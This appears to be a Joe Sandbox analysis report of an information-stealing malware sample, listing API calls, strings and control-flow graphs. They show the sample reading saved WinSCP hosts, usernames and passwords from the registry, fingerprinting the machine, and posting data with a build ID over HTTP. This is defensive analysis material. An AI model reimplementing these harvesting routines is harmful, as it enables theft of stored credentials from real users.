                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memset$Value$Open$EnumH_prolog
                                                                                                                                                                                                                                                                  • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                                                                                                                                                                                                  • API String ID: 784052110-2798830873
                                                                                                                                                                                                                                                                  • Opcode ID: c75e5b9d73e5f5dd4200a58be58c27f4e64653c8e5be3a76a7f316ca235fa12a
                                                                                                                                                                                                                                                                  • Instruction ID: cc4e506a83d5352e1f902376be702dabb6fa496e24ec3c6e83e4b91ed6847460
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c75e5b9d73e5f5dd4200a58be58c27f4e64653c8e5be3a76a7f316ca235fa12a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C0F13DB1D0025EAEDB11DB91CC41FEEBB7CAF15308F1441BBA505B2182DB785B49CB65
                                                                                                                                                                                                                                                                  Function 0040518A Relevance: 54.9, APIs: 21, Strings: 10, Instructions: 647networkstringmemoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 607 40518a-405259 _EH_prolog call 40f9a1 call 403a7d call 40f96a * 5 call 40fb94 InternetOpenA StrCmpCA 624 40525b 607->624 625 40525d-405260 607->625 624->625 626 405266-4053e4 call 410b42 call 40fa6f call 40fa28 call 40f9d5 * 2 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fa6f call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa6f call 40fa28 call 40f9d5 * 2 InternetConnectA 625->626 627 40592b-405951 InternetCloseHandle call 40fb94 call 406295 625->627 626->627 707 4053ea-40541b HttpOpenRequestA 626->707 637 405953-405980 call 40f9de call 40fae3 call 40fa28 call 40f9d5 627->637 638 405985-4059f2 call 410a7a * 2 call 40f9d5 * 4 call 401061 call 40f9d5 627->638 637->638 708 405421-405423 707->708 709 405922-405925 InternetCloseHandle 707->709 710 405425-405435 InternetSetOptionA 708->710 711 40543b-4058c8 call 40fae3 call 40fa28 call 40f9d5 call 40fa6f call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fa6f call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fa6f call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 402107 call 40fa6f call 40fa28 call 40f9d5 * 2 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fa6f call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fa6f call 40fa28 call 40f9d5 call 40fb94 lstrlenA call 40fb94 lstrlenA GetProcessHeap HeapAlloc call 40fb94 lstrlenA call 40fb94 memcpy call 40fb94 lstrlenA call 40fb94 * 2 lstrlenA memcpy call 40fb94 lstrlenA call 40fb94 HttpSendRequestA 708->711 709->627 710->711 872 405904-405919 InternetReadFile 711->872 873 4058ca-4058cf 872->873 874 40591b-40591c InternetCloseHandle 872->874 873->874 875 4058d1-4058ff call 40fae3 call 40fa28 call 40f9d5 873->875 874->709 875->872
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040518F
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: _EH_prolog.MSVCRT ref: 00403A82
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: ??_U@YAPAXI@Z.MSVCRT ref: 00403AB4
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: ??_U@YAPAXI@Z.MSVCRT ref: 00403ABD
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: ??_U@YAPAXI@Z.MSVCRT ref: 00403AC6
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AE0
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AF0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040523A
                                                                                                                                                                                                                                                                  • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004053D9
                                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00405410
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,mode,00000000,?,00000000,?,00425B20,00000000), ref: 0040581F
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00405830
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040583A
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00405841
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00405852
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 00405863
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00405874
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 0040588D
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 00405896
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 004058A9
                                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(?,00000000,00000000), ref: 004058BD
                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,?,000000C7,?), ref: 00405911
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 0040591C
                                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405435
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00405925
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 0040592E
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 00405251
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Internetlstrlen$lstrcpy$H_prolog$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileOptionProcessReadSend
                                                                                                                                                                                                                                                                  • String ID: "$"$"$)$------$------$------$------$build_id$mode
                                                                                                                                                                                                                                                                  • API String ID: 2237346945-290892794
                                                                                                                                                                                                                                                                  • Opcode ID: 15cde97bd73afbed6fd794a2e0f17e168403f53020bbfec37465a8c9ffbaea52
                                                                                                                                                                                                                                                                  • Instruction ID: cacff5b7376e1aa4e6a3563a233f0c292dd44c4774b206ba7d5d547219aa1114
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 15cde97bd73afbed6fd794a2e0f17e168403f53020bbfec37465a8c9ffbaea52
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 19424C71900249EADF11EBE5C956AEEBBB8AF15318F1400BAF106735C2DB781B4CCB65
                                                                                                                                                                                                                                                                  Function 004146E7 Relevance: 51.8, APIs: 3, Strings: 26, Instructions: 1011stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 881 4146e7-4154f9 _EH_prolog call 40f96a call 40fae3 call 40fa28 call 40f9d5 call 4020ed call 40fa6f call 40fa28 call 40f9d5 * 2 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fc7f call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 41045d call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 4104ea call 40fa6f call 40fa28 call 40f9d5 * 2 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 410525 call 40fa6f call 40fa28 call 40f9d5 * 2 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 GetCurrentProcessId call 410fe7 call 40fa6f call 40fa28 call 40f9d5 * 2 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 410693 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 4107a6 call 40fa6f call 40fa28 call 40f9d5 * 2 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 41092f call 40fa6f call 40fa28 call 40f9d5 * 2 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fc44 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fc12 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 4103e8 call 40fa6f call 40fa28 call 40f9d5 * 2 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fd2c call 40fa6f call 40fa28 call 40f9d5 * 2 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fc7f call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fcd9 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fe5f call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fefb call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fec8 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40ffc9 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 410032 call 40fa6f call 40fa28 call 40f9d5 * 2 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 41030b call 40fa6f call 40fa28 call 40f9d5 * 2 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 4100b9 call 40fa6f call 40fa28 call 40f9d5 * 2 call 4100b9 call 40fa6f call 40fa28 call 40f9d5 * 2 call 40fae3 call 40fa28 call 40f9d5 call 40fb94 lstrlenA call 40fb94 call 40f96a call 4010b1 call 414519 call 40f9d5 * 2 call 401061
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 004146EC
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FC7F: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,Version: ,0042653E), ref: 0040FC8D
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FC7F: HeapAlloc.KERNEL32(00000000,?,00000000,?,Version: ,0042653E), ref: 0040FC94
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FC7F: GetLocalTime.KERNEL32(00000000,?,00000000,?,Version: ,0042653E), ref: 0040FCA0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FC7F: wsprintfA.USER32 ref: 0040FCCB
                                                                                                                                                                                                                                                                    • Part of subcall function 0041045D: memset.MSVCRT ref: 00410483
                                                                                                                                                                                                                                                                    • Part of subcall function 0041045D: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,>eB,?,?,00000000), ref: 0041049F
                                                                                                                                                                                                                                                                    • Part of subcall function 0041045D: RegQueryValueExA.KERNEL32(>eB,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 004104BE
                                                                                                                                                                                                                                                                    • Part of subcall function 0041045D: CharToOemA.USER32(?,?), ref: 004104DB
                                                                                                                                                                                                                                                                    • Part of subcall function 004104EA: GetCurrentHwProfileA.ADVAPI32(?), ref: 004104FB
                                                                                                                                                                                                                                                                    • Part of subcall function 00410525: _EH_prolog.MSVCRT ref: 0041052A
                                                                                                                                                                                                                                                                    • Part of subcall function 00410525: GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 0041054D
                                                                                                                                                                                                                                                                    • Part of subcall function 00410525: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 0041057F
                                                                                                                                                                                                                                                                    • Part of subcall function 00410525: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 004105C2
                                                                                                                                                                                                                                                                    • Part of subcall function 00410525: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 004105C9
                                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,004265F0,00000000,?,00000000,00000000,?,HWID: ,00000000,?,004265E4,00000000), ref: 00414A1A
                                                                                                                                                                                                                                                                    • Part of subcall function 00410FE7: OpenProcess.KERNEL32(00000410,00000000,*JA), ref: 00410FFF
                                                                                                                                                                                                                                                                    • Part of subcall function 00410FE7: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0041101A
                                                                                                                                                                                                                                                                    • Part of subcall function 00410FE7: CloseHandle.KERNEL32(00000000), ref: 00411021
                                                                                                                                                                                                                                                                    • Part of subcall function 00410693: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414B0F,00000000,?,Windows: ,00000000,?,00426614,00000000,?,Work Dir: In memory), ref: 004106A7
                                                                                                                                                                                                                                                                    • Part of subcall function 00410693: HeapAlloc.KERNEL32(00000000,?,?,?,00414B0F,00000000,?,Windows: ,00000000,?,00426614,00000000,?,Work Dir: In memory,00000000,?), ref: 004106AE
                                                                                                                                                                                                                                                                    • Part of subcall function 004107A6: _EH_prolog.MSVCRT ref: 004107AB
                                                                                                                                                                                                                                                                    • Part of subcall function 004107A6: CoInitializeEx.OLE32(00000000,00000000,?,?,?,?,?,?,00426614,00000000,?,Work Dir: In memory,00000000,?,004265FC,00000000), ref: 004107BB
                                                                                                                                                                                                                                                                    • Part of subcall function 004107A6: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,?,00426614), ref: 004107CC
                                                                                                                                                                                                                                                                    • Part of subcall function 004107A6: CoCreateInstance.OLE32(004282F0,00000000,00000001,00428220,?,?,?,?,?,?,?,00426614,00000000,?,Work Dir: In memory,00000000), ref: 004107E6
                                                                                                                                                                                                                                                                    • Part of subcall function 004107A6: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,?,?,?,?,?,00426614,00000000), ref: 0041081C
                                                                                                                                                                                                                                                                    • Part of subcall function 004107A6: VariantInit.OLEAUT32(?), ref: 00410877
                                                                                                                                                                                                                                                                    • Part of subcall function 0041092F: _EH_prolog.MSVCRT ref: 00410934
                                                                                                                                                                                                                                                                    • Part of subcall function 0041092F: CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,004265FC,00000000,?,00000000), ref: 00410944
                                                                                                                                                                                                                                                                    • Part of subcall function 0041092F: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,004265FC), ref: 00410955
                                                                                                                                                                                                                                                                    • Part of subcall function 0041092F: CoCreateInstance.OLE32(004282F0,00000000,00000001,00428220,?,?,00000000,?,Work Dir: In memory,00000000,?,004265FC,00000000,?,00000000), ref: 0041096F
                                                                                                                                                                                                                                                                    • Part of subcall function 0041092F: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,004265FC,00000000), ref: 004109A5
                                                                                                                                                                                                                                                                    • Part of subcall function 0041092F: VariantInit.OLEAUT32(?), ref: 004109F4
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FC44: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,00414CB6,00000000,?,Computer Name: ,00000000,?,00426644,00000000,?,00000000,00000000), ref: 0040FC50
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FC44: HeapAlloc.KERNEL32(00000000,?,?,00414CB6,00000000,?,Computer Name: ,00000000,?,00426644,00000000,?,00000000,00000000,?,AV: ), ref: 0040FC57
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FC44: GetComputerNameA.KERNEL32(00000000,00000000), ref: 0040FC6B
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FC12: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0041736F,004265B7), ref: 0040FC1E
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FC12: HeapAlloc.KERNEL32(00000000,?,?,?,0041736F,004265B7), ref: 0040FC25
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FC12: GetUserNameA.ADVAPI32(00000000,?), ref: 0040FC39
                                                                                                                                                                                                                                                                    • Part of subcall function 004103E8: CreateDCA.GDI32(00000000,00000000,00000000,00000001), ref: 004103FD
                                                                                                                                                                                                                                                                    • Part of subcall function 004103E8: GetDeviceCaps.GDI32(00000000,00000008), ref: 00410408
                                                                                                                                                                                                                                                                    • Part of subcall function 004103E8: GetDeviceCaps.GDI32(00000000,0000000A), ref: 00410413
                                                                                                                                                                                                                                                                    • Part of subcall function 004103E8: ReleaseDC.USER32(00000000,00000000), ref: 0041041E
                                                                                                                                                                                                                                                                    • Part of subcall function 004103E8: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,?,00414DB8,?,00000000,?,Display Resolution: ,00000000,?,00426668,00000000,?), ref: 0041042A
                                                                                                                                                                                                                                                                    • Part of subcall function 004103E8: HeapAlloc.KERNEL32(00000000,?,00000000,?,?,00414DB8,?,00000000,?,Display Resolution: ,00000000,?,00426668,00000000,?,00000000), ref: 00410431
                                                                                                                                                                                                                                                                    • Part of subcall function 004103E8: wsprintfA.USER32 ref: 00410443
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FD2C: _EH_prolog.MSVCRT ref: 0040FD31
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FD2C: GetKeyboardLayoutList.USER32(00000000,00000000,004262AF,00000001,?,00000000), ref: 0040FD63
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FD2C: LocalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 0040FD71
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FD2C: GetKeyboardLayoutList.USER32(00000000,00000000,?,00000000), ref: 0040FD7C
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FD2C: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000), ref: 0040FDA6
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FD2C: LocalFree.KERNEL32(?), ref: 0040FE4A
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FCD9: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,Computer Name: ,00000000,?,00426644,00000000,?,00000000,00000000,?,AV: ), ref: 0040FCEA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FCD9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,00426644,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCF1
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FCD9: GetTimeZoneInformation.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,00426644,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FD00
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FCD9: wsprintfA.USER32 ref: 0040FD1E
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE5F: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00415034,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004266C4), ref: 0040FE73
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE5F: HeapAlloc.KERNEL32(00000000,?,?,?,00415034,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004266C4,00000000,?), ref: 0040FE7A
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE5F: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00415034,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 0040FE98
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE5F: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00415034,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 0040FEB4
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FEFB: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 0040FF4E
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FEFB: wsprintfA.USER32 ref: 0040FF94
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FEC8: GetSystemInfo.KERNEL32(00000000), ref: 0040FED5
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FEC8: wsprintfA.USER32 ref: 0040FEEA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFC9: GetProcessHeap.KERNEL32(00000000,00000104,00000001,00000000,00000000,?,Windows: ,00000000,?,00426614,00000000,?,Work Dir: In memory,00000000,?,004265FC), ref: 0040FFD7
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFC9: HeapAlloc.KERNEL32(00000000), ref: 0040FFDE
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFC9: GlobalMemoryStatusEx.KERNEL32 ref: 0040FFFE
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFC9: wsprintfA.USER32 ref: 00410024
                                                                                                                                                                                                                                                                    • Part of subcall function 00410032: _EH_prolog.MSVCRT ref: 00410037
                                                                                                                                                                                                                                                                    • Part of subcall function 00410032: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 0041009F
                                                                                                                                                                                                                                                                    • Part of subcall function 0041030B: _EH_prolog.MSVCRT ref: 00410310
                                                                                                                                                                                                                                                                    • Part of subcall function 0041030B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041034B
                                                                                                                                                                                                                                                                    • Part of subcall function 0041030B: Process32First.KERNEL32(00000000,00000128), ref: 0041035C
                                                                                                                                                                                                                                                                    • Part of subcall function 0041030B: Process32Next.KERNEL32(?,00000128), ref: 004103C4
                                                                                                                                                                                                                                                                    • Part of subcall function 0041030B: CloseHandle.KERNEL32(?,?,00000000), ref: 004103D1
                                                                                                                                                                                                                                                                    • Part of subcall function 004100B9: _EH_prolog.MSVCRT ref: 004100BE
